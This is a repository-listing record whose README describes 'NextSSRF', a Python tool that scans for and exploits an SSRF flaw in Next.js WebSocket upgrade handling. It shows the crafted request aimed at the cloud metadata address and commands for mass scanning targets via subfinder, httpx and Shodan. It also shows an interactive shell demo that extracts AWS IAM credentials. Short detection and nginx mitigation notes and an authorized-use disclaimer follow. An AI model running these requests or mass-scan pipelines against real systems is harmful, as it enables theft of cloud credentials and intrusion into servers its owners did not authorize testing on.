[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-79995":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":14,"stars30d":16,"stars90d":15,"forks30d":15,"starsTrendScore":17,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":9,"pushedAt":9,"updatedAt":23,"readmeContent":24,"aiSummary":25,"trendingCount":15,"starSnapshotCount":15,"syncStatus":14,"lastSyncTime":26,"discoverSource":27},79995,"nextssrf","ynsmroztas\u002Fnextssrf","ynsmroztas","NextSSRF — CVE-2026-44578 Scanner & Exploit          ║ ║   Next.js WebSocket Upgrade Handler SSRF",null,"Python",74,17,71,2,0,3,1,3.77,false,"main",true,[],"2026-06-12 02:03:56","\u003Cdiv align=\"center\">\n\n```\n╔══════════════════════════════════════════════════════════════╗\n║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║\n║   Next.js WebSocket Upgrade Handler SSRF                     ║\n║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║\n║         @mitsec \u002F ynsmroztas — Bug Bounty Tooling            ║\n╚══════════════════════════════════════════════════════════════╝\n```\n\n![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fpython-3.10+-blue?style=flat-square&logo=python)\n![CVE](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCVE-2026--44578-red?style=flat-square)\n![CVSS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCVSS-8.6_High-orange?style=flat-square)\n![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Flicense-MIT-green?style=flat-square)\n![Platform](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fplatform-Linux%20%7C%20Windows%20%7C%20Android-lightgrey?style=flat-square)\n\n**CVE-2026-44578** — Server-Side Request Forgery via Next.js WebSocket Upgrade Handler\n\n[Overview](#overview) · [Install](#install) · [Usage](#usage) · [Pipeline](#pipeline) · [Shodan](#shodan) · [Interactive](#interactive-shell) · [Disclaimer](#disclaimer)\n\n\u003C\u002Fdiv>\n\n---\n\n## Overview\n\nOn May 11, 2026, Vercel patched **CVE-2026-44578** (CVSS 8.6): an unauthenticated SSRF in Next.js's WebSocket upgrade handler affecting all self-hosted deployments from **13.4.13** onward.\n\n### Mechanism\n\n```\nGET http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F HTTP\u002F1.1   ← absolute-form URI\nHost: vulnerable-nextjs.com\nConnection: Upgrade\nUpgrade: websocket\nSec-WebSocket-Version: 13\nSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\n```\n\nThe `\u002F\u002F` in `http:\u002F\u002F` triggers `normalizeRepeatedSlashes` early-exit, setting `statusCode: 308` and `finished: true`. The vulnerable upgrade handler **ignores both flags** and calls `proxyRequest` when `parsedUrl.protocol` is truthy — proxying the request to the attacker-controlled host on **port 80**.\n\n```diff\n\u002F\u002F router-server.ts (vulnerable)\n- if (parsedUrl.protocol) {\n-     return await proxyRequest(req, socket, parsedUrl, head)\n+ if (finished && parsedUrl.protocol) {\n+     if (!statusCode) {\n+         return await proxyRequest(req, socket, parsedUrl, head)\n```\n\n### Affected Versions\n\n| Product         | Vulnerable         | Fixed    |\n|-----------------|--------------------|----------|\n| Next.js         | 13.4.13 – 15.5.15  | 15.5.16  |\n| Next.js         | 16.0.0 – 16.2.4    | 16.2.5   |\n| Vercel-hosted   | ✅ NOT affected     | N\u002FA      |\n\n### Limitations\n\n- **GET only** (no POST\u002FPUT)\n- **Port 80 only** (explicit ports stripped by URL normalization)\n- AWS **IMDSv2** not exploitable (requires PUT token)\n- GCP metadata rejects `Upgrade: websocket` with 400\n- Reverse proxies (nginx\u002Fcaddy\u002FHAProxy) block absolute-form URIs\n\n---\n\n## Demo\n\n![NextSSRF — AWS Credentials Exfiltrated](nextssrf.jpg)\n\n> AWS IMDSv1 credentials exfiltrated via CVE-2026-44578 — interactive exploit shell\n\n---\n\n## Install\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fynsmroztas\u002Fnextssrf\ncd nextssrf\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com\n```\n\n> **Zero dependencies** — Python stdlib only. Python 3.10+ required.\n\n---\n\n## Usage\n\n### Single Target Scan\n\n```bash\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com\n```\n\n### Cloud-Specific Targeting\n\n```bash\n# AWS metadata only\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --cloud aws\n\n# Custom internal target\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com \\\n  --ssrf-host http:\u002F\u002Finternal-api --path \u002Fadmin\n\n# Deep scan (+ internal services)\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --cloud aws --deep\n```\n\n### Mass Scan (Pipeline)\n\n```bash\n# subfinder + httpx + nextssrf\nsubfinder -d target.com | httpx -silent | \\\n  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl\n\n# File input\npython3 nextssrf.py -f targets.txt --threads 15 -o results.json\n\n# Force scan (even if version unknown)\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --force\n```\n\n### Exit Codes\n\n| Code | Meaning                |\n|------|------------------------|\n| `0`  | Not vulnerable \u002F clean |\n| `1`  | Vulnerable (no exploit)|\n| `2`  | SSRF confirmed         |\n\n---\n\n\n## Interactive Shell\n\nAdvanced exploit shell with auto cloud detection and IAM credential extraction:\n\n```bash\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com\n```\n\n```\n╔══════════════════════════════════════════════════╗\n║  NextSSRF v2 — Interactive Exploit Shell         ║\n║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║\n║  CVE    : CVE-2026-44578  |  Status: Connected   ║\n╚══════════════════════════════════════════════════╝\n\nnextssrf(ec2-x...)> cloud\n  [>] Detecting cloud provider...\n  ✓ AWS — matched: ['ami-id', 'instance-id', 'iam\u002F', 'hostname']\n  → Run 'aws' for full credential extraction\n\nnextssrf(ec2-x...)> aws\n  [1\u002F3] Instance Information\n  [200] Hostname    : ip-172-31-47-134.ec2.internal\n  [200] AZ          : us-east-1d\n  [200] Account ID  : {\"AccountId\": \"370741706736\"}\n\n  [2\u002F3] IAM Role Discovery\n  ✓ IAM Role found: my-ec2-role\n\n  [3\u002F3] Credential Extraction\n  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓\n  🎯 AWS CREDENTIALS EXFILTRATED!\n  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓\n  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX\n  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n  Expiration  : 2026-05-14T22:32:22Z\n```\n\n### Shell Commands\n\n| Command        | Description                              |\n|----------------|------------------------------------------|\n| `cloud`        | Auto-detect cloud (AWS\u002FAzure\u002FGCP\u002FDO\u002FOCI) |\n| `aws`          | Full AWS IAM credential chain            |\n| `azure`        | Azure managed identity token             |\n| `scan`         | Cloud detect + auto exploit              |\n| `url \u003Chttp:\u002F\u002F>`| Custom SSRF request                      |\n| `get \u003CN>`      | AWS IMDS target by index                 |\n| `list`         | Show all IMDS endpoints                  |\n| `history`      | Request history                          |\n| `save`         | Export session to JSON                   |\n| `quit`         | Exit                                     |\n\n### Auto Mode\n\n```bash\n# Detect cloud + run full exploit chain automatically\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --auto\n```\n\n---\n\n## Pipeline Examples\n\n```bash\n# Full recon → exploit pipeline\nsubfinder -d target.com \\\n  | httpx -silent -server \\\n  | grep -i \"next\" \\\n  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl\n\n# Shodan mass scan → interactive on confirmed hosts\npython3 shodan_nextjs.py --key KEY --org \"TargetCorp\" \\\n  | python3 nextssrf.py --pipe --cloud aws -o hits.jsonl\n\n# Check specific version range\ncat hosts.txt \\\n  | python3 nextssrf.py --pipe --force --cloud aws \\\n  | jq '.[] | select(.ssrf_hits | length > 0)'\n```\n\n---\n\n## Detection (Blue Team)\n\nSigns of exploitation in logs:\n\n```\n# Next.js process logs\nFailed to proxy http:\u002F   ← single slash = normalization fingerprint\n\n# Access logs (absolute-form URI + Upgrade header)\nGET http:\u002F\u002F169.254.169.254\u002F... HTTP\u002F1.1\nConnection: Upgrade\nUpgrade: websocket\n```\n\n### Mitigation (if can't patch)\n\n```nginx\n# Nginx: reject absolute-form request URIs\nif ($request_uri ~* \"^https?:\u002F\u002F\") {\n    return 400;\n}\n```\n\n\n\n---\n\n## References\n\n- [GHSA-c4j6-fc7j-m34r](https:\u002F\u002Fgithub.com\u002Fvercel\u002Fnext.js\u002Fsecurity\u002Fadvisories\u002FGHSA-c4j6-fc7j-m34r)\n- [NVD CVE-2026-44578](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2026-44578)\n- [Next.js Security Release May 2026](https:\u002F\u002Fnextjs.org\u002Fblog\u002Fsecurity-release-2026-05)\n- [Hadrian Technical Analysis](https:\u002F\u002Fhadrian.io\u002Fblog\u002Fnext-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2)\n\n---\n\n## Disclaimer\n\n> **For authorized security testing and bug bounty research only.**\n> Use only against systems you own or have explicit written permission to test.\n> The authors are not responsible for misuse or unauthorized use.\n> Always follow your bug bounty program's rules of engagement.\n\n---\n\n\u003Cdiv align=\"center\">\n\nMade with ❤️ by [@mitsec](https:\u002F\u002Fgithub.com\u002Fynsmroztas) · [ynsmroztas.github.io](https:\u002F\u002Fynsmroztas.github.io)\n\n**Top Hacker @ Intigriti · 100+ HOF · 2430+ Vulnerabilities · 1100+ P1 Critical**\n\n\u003C\u002Fdiv>\n","NextSSRF 是一个针对 CVE-2026-44578 漏洞的扫描和利用工具，该漏洞存在于 Next.js 的 WebSocket 升级处理器中，导致服务器端请求伪造（SSRF）。项目使用 Python 编写，能够检测并利用受影响版本（13.4.13 至 15.5.15 和 16.0.0 至 16.2.4）中的漏洞。其核心功能包括通过发送特定格式的 HTTP 请求来触发 SSRF，并进一步执行攻击操作。适用于安全研究人员、渗透测试人员在评估和加固基于 Next.js 构建的应用程序安全性时使用。请注意，此工具仅供合法授权的安全测试用途。","2026-06-11 03:58:50","CREATED_QUERY"]